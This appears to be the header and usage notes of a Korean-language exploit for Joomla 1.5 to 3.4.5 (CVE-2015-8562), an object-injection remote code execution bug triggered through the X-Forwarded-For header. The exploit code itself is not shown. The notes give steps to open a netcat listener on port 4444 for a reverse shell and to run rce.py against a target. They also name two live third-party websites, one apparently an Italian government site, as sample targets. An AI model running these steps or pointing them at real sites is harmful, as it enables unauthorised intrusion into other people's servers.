
Joomla 1.5 - 3.4.5 객체 인젝션 RCE X-Forwarded-For 헤더
익스플로잇: Joomla 1.5 - 3.4.5 객체 주입 RCE X-Forwarded-For 헤더:
취약점 발견일: 2015-12-17
익스플로잇 작성자: anarc0der
버전: Joomla 1.5 ~ 3.4.5
CVE : CVE-2015-8562
사용 방법:
터미널 하나를 열고 nc로 수신 대기: $ nc -lnvp 4444
다른 터미널을 열고 익스플로잇 실행:
python3 rce.py --target='대상' --ip='IP' --port=4444
PoC 대상 예시 (망치지 마세요, 다른 사람들이 예제로 사용할 수 있도록):
http://www.monitoraggiograduatorie.gov.it/
http://budo-aykac.nl/